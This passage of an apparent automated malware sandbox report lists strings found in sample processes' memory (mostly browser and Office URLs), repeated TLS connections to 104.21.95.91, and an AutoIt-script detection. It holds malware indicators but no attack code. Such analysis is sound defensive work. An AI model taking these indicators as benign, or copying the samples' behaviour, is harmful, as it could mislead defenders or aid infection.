https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: e192e43b61.exe, 0000000A.00000003.2606825892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1732680990.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2269794608.000000001D6EC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606825892.0000000005805000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005B07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: e192e43b61.exe, 0000000A.00000003.2606825892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/8bad2467092e6ddeb0dfa9e5ea54d86d26790ca7ba2ce88d1
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServiceipc:first-content-process-c
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EEE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2946205914.00000099786FC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/91
Source: file.exe, 00000000.00000003.1767913034.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641410618.0000000005A18000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2785886618.0000000005BB5000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/cQWpLyAVcZI.exe
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.1767913034.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641410618.0000000005A18000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2785886618.0000000005BB5000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001D.00000002.2946205914.00000099786FC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/cleanupTemporaryAddons/promise
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/aInstanceID
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E532000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945

Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50062 version: TLS 1.2

System Summary

Binary is likely a compiled AutoIt script file

Source: 5e28f62265.exe, 0000000E.00000000.2797533174.00000000009B2000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_a4f7615f-9
